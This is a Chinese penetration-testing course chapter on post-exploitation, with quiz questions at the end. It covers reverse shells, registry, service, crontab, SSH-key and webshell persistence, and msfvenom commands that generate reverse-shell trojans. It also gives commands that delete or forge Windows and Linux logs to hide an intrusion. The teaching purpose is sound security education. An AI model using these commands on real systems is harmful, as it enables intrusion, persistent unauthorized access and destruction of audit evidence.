滲透測試技術(shù)-教學(xué)課件 第六章后滲透技術(shù)

第六章后滲透技術(shù)目錄CONTENTS01后滲透基礎(chǔ)02反彈Shell03權(quán)限維持04木馬的生成與利用05入侵痕跡清除后滲透基礎(chǔ)PART.01后滲透基礎(chǔ)——概念與實(shí)現(xiàn)方式后滲透是指在成功獲取目標(biāo)系統(tǒng)訪問權(quán)限后，針對目標(biāo)系統(tǒng)進(jìn)行更加深入、持久性的攻擊和控制的一種滲透測試技術(shù)。在后滲透階段，滲透測試人員會(huì)嘗試維持持久性的權(quán)限控制、獲取敏感信息、深入挖掘系統(tǒng)漏洞、弱化系統(tǒng)的防御措施。在這個(gè)階段，滲透測試人員需要盡可能地隱藏自己的行蹤，避免被系統(tǒng)管理員和安全設(shè)備檢測到。后滲透測試通常包括反彈Shell權(quán)限維持、木馬的生成與利用、入侵痕跡清除等相關(guān)技術(shù)，以達(dá)到完整的滲透測試目標(biāo)。進(jìn)行后滲透測試可以找出系統(tǒng)的漏洞和弱點(diǎn)，及時(shí)對漏洞進(jìn)行修復(fù)，加強(qiáng)系統(tǒng)的安全措施，從而提升信息系統(tǒng)的安全性。常見的后滲透方式如下。（1）創(chuàng)建綁定Shell（bindshell）或反彈Shell（reverseshell）。（2）創(chuàng)建調(diào)度任務(wù)。（3）創(chuàng)建守護(hù)進(jìn)程。（4）創(chuàng)建新用戶。（5）創(chuàng)建后門。（6）上傳工具。（7）執(zhí)行ARP掃描。（8）執(zhí)行DNS和目錄服務(wù)枚舉。（9）執(zhí)行爆破攻擊。（10）配置端口轉(zhuǎn)發(fā)。反彈ShellPART.02反彈shell概念反彈Shell就是攻擊機(jī)器監(jiān)聽在某個(gè)TCP/UDP端口為服務(wù)端，目標(biāo)機(jī)器向攻擊機(jī)器監(jiān)聽的端口主動(dòng)發(fā)起請求，并將其命令行的輸入和輸出轉(zhuǎn)到攻擊機(jī)器。假設(shè)我們攻擊了一臺機(jī)器，打開了該機(jī)器的一個(gè)端口，攻擊者在自己的機(jī)器上連接目標(biāo)機(jī)器（目標(biāo)機(jī)器的IP地址：目標(biāo)機(jī)器端口），這是比較常規(guī)的形式，稱為正向連接。遠(yuǎn)程桌面、Web服務(wù)、SSH、Telnet等都是正向連接。那么為什么要使用反彈Shell呢？反彈Shell通常適用于以下幾種情況。（1）目標(biāo)機(jī)器因防火墻受限，只能發(fā)送請求，不能接收請求。（2）目標(biāo)機(jī)器端口被占用。（3）目標(biāo)機(jī)器位于局域網(wǎng)，或者IP地址會(huì)動(dòng)態(tài)變化，攻擊機(jī)器無法直接連接。（4）對于病毒、木馬，受害者什么時(shí)候能“中招”，對方的網(wǎng)絡(luò)環(huán)境是什么樣的，什么時(shí)候開關(guān)機(jī)等情況，都是未知的。對于以上幾種情況，我們無法利用正向連接，要利用反向連接。反向連接就是攻擊者指定服務(wù)端，目標(biāo)機(jī)器主動(dòng)連接攻擊者的服務(wù)端程序。Linux與windows系統(tǒng)下反彈Shell使用netcat反彈shell使用bash反彈shellwindows系統(tǒng)下反彈shell與linux下并無差異，也可使用nc用相同命令進(jìn)行反彈，故此處不再贅述。權(quán)限維持PART.03windows權(quán)限維持——輔助功能鏡像劫持映像劫持也被稱為IFEO（ImageFileExecutionOptions），是Windows系統(tǒng)內(nèi)置的調(diào)試功能。當(dāng)用戶運(yùn)行程序時(shí)，系統(tǒng)會(huì)查詢IFEO注冊表。如果存在與程序名相同的子鍵，就查詢該子鍵下的Debugger鍵。如果參數(shù)不為空，就使用Debugger參數(shù)指定的程序替換用戶嘗試啟動(dòng)的程序。操作方法是修改IFEO注冊表。以設(shè)置中心utilman.exe為例，可以在IFEO注冊表路徑HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions下添加utilman.exe項(xiàng)，并在該項(xiàng)中添加Debugger鍵，值為需要啟動(dòng)的程序路徑。對應(yīng)的cmd命令為“REGADD"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\utilman.exe"/tREG_SZ/vDebugger/d"C:\test.bat"/f”。IFEO注冊表鍵值情況及啟動(dòng)效果如圖所示windows權(quán)限維持——啟動(dòng)項(xiàng)/服務(wù)后門啟動(dòng)項(xiàng)/服務(wù)后門是指在被攻擊主機(jī)上創(chuàng)建一個(gè)惡意的啟動(dòng)項(xiàng)或服務(wù)，當(dāng)計(jì)算機(jī)重啟時(shí)，啟動(dòng)項(xiàng)或服務(wù)將自動(dòng)啟動(dòng)并為攻擊者提供訪問被攻擊主機(jī)的權(quán)限。攻擊者可以利用這些后門來遠(yuǎn)程操縱系統(tǒng)、竊取敏感信息或進(jìn)行其他惡意活動(dòng)。為了創(chuàng)建啟動(dòng)項(xiàng)/服務(wù)后門，攻擊者需要獲取系統(tǒng)管理員權(quán)限。這通常需要在被攻擊主機(jī)上執(zhí)行一個(gè)有效載荷，如利用漏洞進(jìn)行攻擊、社會(huì)工程學(xué)攻擊等。當(dāng)攻擊者獲取了管理員權(quán)限后，可以使用以下方法創(chuàng)建后門。創(chuàng)建一個(gè)新的服務(wù)：攻擊者可以使用sc.exe命令或編寫一個(gè)PowerShell腳本來創(chuàng)建一個(gè)新的服務(wù)，并將其設(shè)置為自動(dòng)啟動(dòng)。修改現(xiàn)有服務(wù)：攻擊者可以使用RegistryEditor或PowerShell等工具來修改現(xiàn)有服務(wù)的配置，使其在計(jì)算機(jī)重啟時(shí)自動(dòng)啟動(dòng)并連接攻擊者的控制器。創(chuàng)建一個(gè)計(jì)劃任務(wù)：攻擊者可以使用Windows計(jì)劃任務(wù)功能來創(chuàng)建一個(gè)新的計(jì)劃任務(wù)，并將其配置為在計(jì)算機(jī)重啟時(shí)自動(dòng)執(zhí)行。windows權(quán)限維持——系統(tǒng)計(jì)劃任務(wù)后門系統(tǒng)計(jì)劃任務(wù)后門是指在被攻擊主機(jī)上創(chuàng)建一個(gè)惡意計(jì)劃任務(wù)，當(dāng)計(jì)算機(jī)按照預(yù)定時(shí)間執(zhí)行該任務(wù)時(shí)，將自動(dòng)執(zhí)行某些命令或程序。攻擊者可以利用該后門來遠(yuǎn)程操縱系統(tǒng)、竊取敏感信息或進(jìn)行其他惡意活動(dòng)。系統(tǒng)計(jì)劃任務(wù)后門是一種常見的權(quán)限維持技術(shù)，攻擊者可以使用它在被攻擊主機(jī)上保留訪問權(quán)限。一旦建立了系統(tǒng)計(jì)劃任務(wù)后門，它就會(huì)在預(yù)定時(shí)間或事件發(fā)生時(shí)執(zhí)行，從而為攻擊者提供訪問計(jì)算機(jī)的機(jī)會(huì)。為了創(chuàng)建系統(tǒng)計(jì)劃任務(wù)后門，攻擊者需要獲取管理員權(quán)限。攻擊者可以使用以下方法創(chuàng)建系統(tǒng)計(jì)劃任務(wù)后門。使用Windows計(jì)劃任務(wù)功能創(chuàng)建一個(gè)新的計(jì)劃任務(wù)，并將其配置為在計(jì)算機(jī)重啟時(shí)自動(dòng)執(zhí)行。修改現(xiàn)有的計(jì)劃任務(wù)：攻擊者可以使用TaskSchedulerEditor或PowerShell等工具來修改現(xiàn)有計(jì)劃任務(wù)的配置，使其在計(jì)算機(jī)重啟時(shí)自動(dòng)執(zhí)行并連接攻擊者的控制器。Linux權(quán)限維持——crontab計(jì)劃任務(wù)后門crontab是一種常用的計(jì)劃任務(wù)管理工具，可以在Linux或類UNIX系統(tǒng)上定期或周期性地執(zhí)行指定的命令或腳本。攻擊者可以通過修改crontab文件，在其中插入惡意代碼或執(zhí)行惡意腳本，從而實(shí)現(xiàn)crontab計(jì)劃任務(wù)后門。以下是crontab計(jì)劃任務(wù)后門攻擊的兩種方式。crontab查詢?nèi)缬覉D所示。1）修改已有的crontab計(jì)劃任務(wù)攻擊者可以利用文件I/O操作，修改系統(tǒng)中已經(jīng)存在的crontab文件，將已有的crontab計(jì)劃任務(wù)的命令或腳本替換成惡意代碼或后門程序。另外，攻擊者也可以修改文件權(quán)限，使只有管理員才能訪問crontab文件，從而提高其隱蔽性。2）創(chuàng)建新的crontab計(jì)劃任務(wù)攻擊者也可以創(chuàng)建一個(gè)新的crontab計(jì)劃任務(wù)，在其中設(shè)定一個(gè)惡意命令或腳本，從而實(shí)現(xiàn)crontab計(jì)劃任務(wù)后門。為了提高攻擊的成功率，攻擊者可以選擇在用戶不注意的時(shí)候進(jìn)行這種攻擊，如在用戶登錄時(shí)自動(dòng)執(zhí)行。Linux權(quán)限維持——SSH公鑰免密在客戶端執(zhí)行“ssh-keygen-trsa”命令生成一對RSA密鑰，如右圖所示。將公鑰id_rsa.pub寫入服務(wù)器的authorized_keys文件并調(diào)整相應(yīng)權(quán)限。服務(wù)端只需要執(zhí)行“catid_dsa.pub>>~/.ssh/authorized_key”命令，公鑰對應(yīng)的私鑰所有者就可以免密登錄服務(wù)器了。這種后門方式雖然簡單易用，但在實(shí)戰(zhàn)中會(huì)受服務(wù)器配置環(huán)境的限制。例如，如果服務(wù)端的SSH配置中禁止基于公鑰的身份驗(yàn)證，或者對authorized_keys文件的訪問權(quán)限有嚴(yán)格的限制，這種方法就無法使用。另外，因?yàn)閍uthorized_keys文件中的公鑰使用的是明文，因此安全人員或系統(tǒng)管理員在審查系統(tǒng)或進(jìn)行安全檢查時(shí)，可能很容易發(fā)現(xiàn)這種后門。Web權(quán)限維持——WebShell隱藏WebShell是一種通過Web應(yīng)用程序接口（如PHP、ASP等）運(yùn)行的惡意代碼。攻擊者可以借助WebShell實(shí)現(xiàn)對目標(biāo)網(wǎng)站的遠(yuǎn)程控制和文件操作等。為了避免被發(fā)現(xiàn)，攻擊者通常會(huì)將WebShell隱藏在正常的程序代碼中，如隱蔽地將WebShell代碼嵌入常用的PHP文件。使用Windows自帶命令行工具Attrib顯示或更改文件屬性。例如，將webshell.php文件設(shè)置為只讀文件、系統(tǒng)文件，并且隱藏文件屬性，隱藏方式如下圖所示。Web權(quán)限維持——配置文件型后門配置文件型后門也被稱為ConfigBackdoor，是一種常見的后門形式。攻擊者通過在標(biāo)服務(wù)器上植入惡意的配置文件，實(shí)現(xiàn)對目標(biāo)服務(wù)器的遠(yuǎn)程控制和敏感信息的竊取。例如，編輯.htaccess文件，在.htaccess文件中添加PHP解析的新后綴并上傳，之后上傳該后綴的木馬即可。木馬執(zhí)行右圖所示。Web權(quán)限維持——中間件后門中間件后門是指攻擊者利用中間件漏洞或安全漏洞，在目標(biāo)服務(wù)器上植入惡意代碼，以達(dá)到竊取敏感信息、繞過訪問控制和遠(yuǎn)程控制服務(wù)器等目的。中間件后門的攻擊手段多種多樣，下面列舉幾種常見的中間件后門攻擊方式。（1）中間件逆向代理后門：攻擊者在中間件中插入逆向代理腳本，將正常的HTTP請求重定向到攻擊者指定的服務(wù)器地址，以達(dá)到竊取敏感信息和發(fā)起遠(yuǎn)程攻擊的目的。（2）中間件緩存污染后門：攻擊者利用中間件緩存機(jī)制中的漏洞，對緩存進(jìn)行篡改，向后續(xù)訪問請求中注入惡意代碼，從而達(dá)到攔截用戶數(shù)據(jù)、竊取密碼等目的。（3）中間件文件上傳后門：攻擊者利用中間件上傳文件功能中的漏洞，將惡意文件上傳到服務(wù)器，從而實(shí)現(xiàn)竊取敏感信息、執(zhí)行系統(tǒng)命令等目的。木馬的生成與利用PART.04圖片木馬的生成與利用圖片馬:就是在圖片中隱藏一句話木馬。利用.htaccess等解析圖片為PHP或者asp文件。達(dá)到執(zhí)行圖片內(nèi)代碼目的。圖片寫入惡意代碼上傳圖片馬蟻劍連接使用MSF生成木馬及使用使用MSF工具中的msfvenom模塊生成后門木馬的命令如下所示。1）LinuxMSFvenom-plinux/x64/meterpreter/reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-felf>shell.elf2）WindowsMSFvenom-pwindows/meterpreter/reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fexe>shell.exe3）PHPMSFvenom-pphp/meterpreter_reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>shell.phpcatshell.php|pbcopy&&echo'<?php'|tr-d'\n'>shell.php&&pbpaste>>shell.php4）ASPMSFvenom-pwindows/meterpreter/reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fasp>shell.asp5）JSPMSFvenom-pjava/jsp_shell_reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>shell.jsp6）PythonMSFvenom-pcmd/unix/reverse_pythonLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>shell.py7）BashMSFvenom-pcmd/unix/reverse_bashLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>shell.sh8）PerlMSFvenom-pcmd/unix/reverse_perlLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>shell.pl以上是基本的生成后門木馬的命令，存放到目標(biāo)機(jī)器上并運(yùn)行后，在本地監(jiān)聽端口即可，但是需要有一個(gè)公網(wǎng)的IP地址。入侵痕跡清除PART.05Windows入侵痕跡清除為了方便管理員了解和掌握計(jì)算機(jī)的運(yùn)行狀態(tài)，Windows提供了完善的日志功能，將系統(tǒng)服務(wù)、權(quán)限設(shè)置和軟件運(yùn)行等相關(guān)事件詳細(xì)地記錄在日志中。所以，通過觀察、分析系統(tǒng)日志，有經(jīng)驗(yàn)的管理員不僅可以了解攻擊者對系統(tǒng)做了哪些改動(dòng)，還可以找出入侵的來源，如從FTP日志找出攻擊者登錄的IP地址。因此，清除日志幾乎成為攻擊者入門的必修課。Windows日志的路徑如下。（1）系統(tǒng)日志：%SystemRoot%\System32\Winevt\Logs\System.evtx。（2）安全日志：%SystemRoot%\System32\Winevt\Logs\Security.evtx。（3）應(yīng)用程序日志：%SystemRoot%\System32\Winevt\Logs\Application.evtx。日志位于注冊表的HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog。Windows入侵痕跡清除清除Windows日志的方式有以下幾種。（1）最簡單的方式。選擇“開始”→“運(yùn)行”命令，在彈出的“運(yùn)行”對話框中輸入“eventvwr”，進(jìn)入事件查看器，選擇“清除日志”選項(xiàng)。（2）使用命令行一鍵清除Windows日志，使用的命令如下。PowerShell-Command"&{Clear-Eventlog-LogApplication,System,Security}"Get-WinEvent-ListLogApplication,Setup,Security-Force|%{Wevtutil.execl$_.Logname}（3）利用腳本停止日志的記錄。使用腳本遍歷事件日志服務(wù)進(jìn)程（專用svchost.exe）的線程堆棧并標(biāo)識事件日志線程，以終止事件日志服務(wù)線程。此時(shí)，系統(tǒng)將無法收集日志，盡管事件日志服務(wù)看似正在運(yùn)行。GitHub項(xiàng)目地址：/hlldz/Invoke-Phant0m。（4）Windows單條日志清除。該工具主要用于刪除Windows日志中指定的記錄。GitHub項(xiàng)目地址：/QAX-A-Team/EventCleaner。（5）Windows日志偽造。使用eventcreate命令行工具偽造日志或使用自定義的大量垃圾信息覆蓋現(xiàn)有日志。執(zhí)行的命令為“eventcreate-lsystem-soadministrator-twarning-d"thisisatest"-id500”。Linux入侵痕跡清除——清除系統(tǒng)日志Linux系統(tǒng)會(huì)將各種系統(tǒng)日志記錄在/var/log/目錄下的文件中。攻擊者可以清除這些日志文件，以隱藏其攻擊行為，通?？蓤?zhí)行以下命令。sudorm/var/log/auth.log*sudorm/var/log/syslog*sudorm/var/log/dpkg.log*上述命令分別清除了/var/log/auth.log、/var/log/syslog和/var/log/dpkg.log系統(tǒng)日志文件。當(dāng)然，這只是一個(gè)示例，攻擊者應(yīng)該根據(jù)實(shí)際情況決定需要清除哪些日志文件。Linux入侵痕跡清除——關(guān)閉Linux的syslog守護(hù)進(jìn)程syslog守護(hù)進(jìn)程默認(rèn)會(huì)記錄所有系統(tǒng)事件，包括用戶登錄、系統(tǒng)啟動(dòng)等信息。攻擊者可以關(guān)閉syslog守護(hù)進(jìn)程，阻止系統(tǒng)記錄這些事件，以避免被發(fā)現(xiàn)。關(guān)閉syslog守護(hù)進(jìn)可以執(zhí)行“sudoservicersyslogstop”命令。清除Web入侵痕跡1）清除Web服務(wù)器訪問日志W(wǎng)eb服務(wù)器會(huì)記錄每個(gè)訪問者的IP地址、訪問時(shí)間和訪問頁面等信息。攻擊者可以通過修改Web服務(wù)器訪問日志來隱藏其攻擊行為。使用以下命令可以清除這些Web服務(wù)器訪問日志。sudofind/var/log/nginx-name"*.log"-typef-deletesudofind/var/log/apache2-name"*.log"-typef-delete使用上述命令將清除nginx和apache2兩種主流Web服務(wù)器的訪問日志。2）清除Web應(yīng)用程序日志W(wǎng)eb應(yīng)用程序通常會(huì)記錄其運(yùn)行狀態(tài)、錯(cuò)誤信息等。攻擊者可以清除這些Web應(yīng)用程序日志來隱藏其攻擊行為。使用以下命令可以清除這些Web應(yīng)用程序日志。sudorm-rf/var/log/tomcat*sudorm-rf/var/log/apache-tomcat*使用上述命令將清除Tomcat日志文件。清除Web入侵痕跡3）手動(dòng)清除異常數(shù)據(jù)有時(shí)，攻擊者在Web應(yīng)用程序中插入的惡意數(shù)據(jù)可能不會(huì)記錄在上述日志文件中，因此需要手動(dòng)進(jìn)行清除。例如，攻擊者可能會(huì)創(chuàng)建一個(gè)包含惡意代碼的文件并將其放在

Web應(yīng)用程序的目錄或數(shù)據(jù)庫中，這些異常數(shù)據(jù)需要手動(dòng)查找并清除。4）還原數(shù)據(jù)庫如果攻擊者入侵了數(shù)據(jù)庫，就可能會(huì)在數(shù)據(jù)庫中留下不安全的記錄。因此，需要檢查數(shù)據(jù)庫中的數(shù)據(jù)，并進(jìn)行清理。如果攻擊者篡改了數(shù)據(jù)庫中的數(shù)據(jù)，就可以嘗試還原數(shù)據(jù)庫。清除Web入侵痕跡5）清除Web程序緩存Web程序通常會(huì)將一些數(shù)據(jù)緩存在內(nèi)存中，如session、cookie等信息。攻擊者可以清除這些緩存來隱藏其攻擊行為。一般來說，使用以下命令可以清除這些緩存。sudosystemctlstopphp-fpmsudorm-rf/var/lib/php/sessions/*sudosystemctlstartphp-fpm使用上述命令將清除PHP-FPM緩存中的session。6）應(yīng)用程序代碼版本回溯在Web應(yīng)用程序中，攻擊者可能會(huì)留下后門程序、漏洞利用腳本等惡意代碼，以方便后續(xù)的訪問。對應(yīng)用程序代碼庫的版本進(jìn)行回溯并重新部署可以清除這些惡意代碼。本章知識小測一、單項(xiàng)選擇題1．在進(jìn)行后滲透測試時(shí)，以下哪種操作不能幫助攻擊者維持對目標(biāo)系統(tǒng)的持久性控制？（

）A．創(chuàng)建綁定Shell或反彈Shell B．創(chuàng)建調(diào)度任務(wù)C．執(zhí)行ARP掃描 D．創(chuàng)建新用戶2．以下哪種情況不適用于使用反彈Shell？（

）A．目標(biāo)機(jī)器因防火墻受限，只能發(fā)送請求，不能接收請求B．目標(biāo)機(jī)器端口被占用